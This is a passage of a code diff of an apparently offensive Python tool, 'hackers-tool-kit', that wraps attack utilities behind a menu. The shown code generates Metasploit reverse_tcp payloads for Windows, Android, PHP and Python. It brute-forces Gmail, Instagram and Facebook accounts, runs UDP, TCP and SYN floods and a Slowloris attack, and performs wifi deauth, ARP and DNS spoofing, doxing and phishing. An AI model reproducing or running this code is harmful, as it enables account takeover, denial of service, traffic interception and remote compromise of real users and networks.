.---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + +def mainbanner22(): + print """{0} + + ██ ██ ██ ██ ███ + ██ ███ █████████ ███ ▄█ █▀ + ███ ███ ███ ███▐██▀ + ███▄▄▄▄███ ██{1} █████▀ + ██ ▀▀▀▀███ ███ ████▄ + ███ ███ ███ ███▐██▄ + ███ ██ ██ ██ ▀█ █▄ + {2} ███ ███ █ ███ ███ + + """.decode('utf-8').format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,22) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() + if num == 22: + mainbanner22() + +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# def help(): print B+""" ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ @@ -179,12 +804,17 @@ def help(): ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ \033[0m ░ ? : displays this message -clear : clears screen except for banner +reboot : reboot hackers-tool-kit +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner exit : exits script restart : re run hackers-tool-kit rebootl : reboot whole device +anon : make yourself anonymous [\033[33manon on \033[0m|\033[33m anon off\033[0m] winload : windows reverse_tcp payload andload : android reverse_tcp payload +connect : connect to a host command : execute terminal command msfcon : metasploit console set : setoolkit console @@ -197,14 +827,16 @@ def help(): ipgrab : host to ip address myip : show your ip wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] +reaver : reaver automated [\033[33m wifi hack \033[0m] +aircrack: aircrack-ng automated [\033[33m wifi hack \033[0m] mon : put device in monitor mode monoff : put device out of monitor mode netdev : find all devices in your network scannet : scan for networks around you specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +port : scan for ports on a host +specscan: specific info gather on a host +info : info gather on a host [\033[33mincludes port scan\033[0m]\033[91m █████████████████████ \033[0m sysinfo : info about your system \033[91m ██ ██\033[0m msfex : shows all metasploit exploits \033[91m ██ ██\033[0m msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m @@ -217,23 +849,23 @@ def help(): ping : pings host \033[91m █ █\033[0m multih : start a multi handler \033[91m █ █\033[0m cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn +vdir : view files of a directory +vpn : activate a vpn vpnoff : stop vpn pidox : dox website pingen : Generate a routers default pin deauth : deauth attack / wifi jammer macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit cloud : cloudflare bypass brutex : auto bruteforce every service of a host methelp : show meterpreter help @@ -241,8 +873,33 @@ def help(): exploit : use a metasploit exploit of your choice phish : phishing automated datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [\033[33mproxychains setup required\033[0m] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (\033[33minfo gathering tool\033[0m) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [\033[33mtype dnsspoofall to spoof entire subnet\033[0m] +htk-lite: run a lighter version of hackers-tool-kit \033[91m---------------------------------------------------------------------------------\033[0m """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# def winload(): gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -254,6 +911,12 @@ def winload(): na = raw_input("Name of File: ") ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# def andload(): gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -265,6 +928,45 @@ def andload(): na = raw_input("Name of File: ") ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#ANONYMOUS START# +#---------------# +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python htk.py --quickrun') + + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() +#ANONYMOUS END# +#-------------# + +#GMAIL BRUTEFORCE START# +#----------------------# def gmail(): #!/usr/bin/python '''create by Ha3MrX''' @@ -340,20 +1042,41 @@ def login(): else: print '[!] password not found => ' + password login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# def port(): n = raw_input("Enter Target: ") os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# def insta(): insta = raw_input("USERNAME> ") jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# def fb(): facebook = raw_input("[EMAIL/ID->]: ") word = raw_input("[WORDLIST->]: ") ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# def ipgrab(): b = raw_input(Y+'Enter Host:\033[0m ') ip = socket.gethostbyname(b) @@ -361,6 +1084,11 @@ def ipgrab(): print N+"Host: ", b print N+"IP: ", ip print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# def myip(): gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -369,14 +1097,42 @@ def myip(): gateway = gw[2] host = socket.gethostname() print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# def wifite(): os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# def mon(): os.system("iwconfig") i = raw_input("Select Interface: ") os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# def netdev(): os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# def scannet(): os.system("iwconfig") m = raw_input("Select Interface: ") @@ -387,6 +1143,12 @@ def scannet(): print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" if j == "n": os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# def info(): params = [] # Browser @@ -649,10 +1411,165 @@ def fingerprint(ip_addr): print url except: pass +#------------------# +#INFO SCAN HOST END# + + +#SPEC INFO SCAN START# +#--------------------# +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True +#------------------# +#SPEC INFO SCAN END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") os.system("ifconfig") + print "\n" os.system("iwconfig") + print "\n" os.system("neofetch") + print "\n" gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((gw[2], 0)) @@ -660,9 +1577,28 @@ def sysinfo(): gateway = gw[2] host = socket.gethostname() print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# def msfex(): os.system("service postgresql start") os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# def udp(): target = raw_input(N+"Target:\033[91m ") ip = socket.gethostbyname(target) @@ -681,9 +1617,24 @@ def udp(): print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) if port == 65534: port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# def syn(): def randomIP(): ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) @@ -731,22 +1682,57 @@ def main(): SYN_Flood(dstIP,dstPort,int(counter)) main() +#-------------# +#SYN FLOOD END# + +#PING A HOST START# +#-----------------# def ping(): p = raw_input("Enter Host: ") os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# def msfpa(): os.system("service postgresql start") os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# def msfau(): os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliarys'""") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# def multih(): os.system("service postgresql start") os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# def msfall(): os.system("service postgresql start") os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# def hydra(): """ This program is just a small program to shorten brute force sessions on hydra :) @@ -951,9 +1937,21 @@ def restart_program(): print "\n[!] ERROR : Wrong Input" time.sleep(1) restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# def cupp(): os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# def vdir(): print "\n" os.system("ls") @@ -964,35 +1962,69 @@ def vdir(): print "--------------------------------------------------------------------------------------------------------------------------------------------" os.system("ls " + h) print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + +#MONITOR MODE OFF START# +#----------------------# def monoff(): os.system("iwconfig") i = raw_input("Select Interface: ") os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# def vpn(): os.system("anonsurf start") os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# def vpnoff(): os.system("anonsurf stop") os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# def slowl(): de = raw_input("Delay: ") tar = raw_input("RHOST: ") port = raw_input("RPORT: ") soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# def pidox(): print Y+"! USING FIREFOX !\033[0m" os.system("sleep 2") os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# def specnet(): jk = raw_input("BSSID: ") kj = raw_input("ESSID: ") @@ -1006,16 +2038,34 @@ def specnet(): if j == "n": a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# def pingen(): j = raw_input("Enter BSSID: ") a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# def reaver(): os.system("iwconfig") j = raw_input("Select Interface: ") k = raw_input("Enter BSSID: ") a = 'reaver -i {0} -b {1} -vv'.format(j,k) os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# def deauth(): print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" j = raw_input("Enter BSSID> ") @@ -1023,6 +2073,12 @@ def deauth(): k = raw_input("Enter Interface> ") a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# def macc(): os.system("iwconfig") k = raw_input("Interface: ") @@ -1031,6 +2087,12 @@ def macc(): os.system("macchanger -r " + k) s = 'ifconfig {0} up'.format(k) os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# def macoff(): os.system("iwconfig") k = raw_input("Interface: ") @@ -1039,86 +2101,55 @@ def macoff(): os.system("macchanger -p " + k) s = 'ifconfig {0} up'.format(k) os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# def sslscan(): j = raw_input('Enter Target: ') a = 'sslscan {0}'.format(j) os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# def payload(): os.system("cat /root/hackers-tool-kit/tools/payloads.txt") print "\n" f = raw_input("Select Payload: ") l = raw_input("LHOST: ") c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# def crunch(): print "minimal number of characters" j = raw_input("[CRUNCH]: ") @@ -1131,10 +2162,22 @@ def crunch(): a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) os.system(a) print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# def traff(): os.system("iwconfig") s = raw_input("Select Interface: ") os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# def 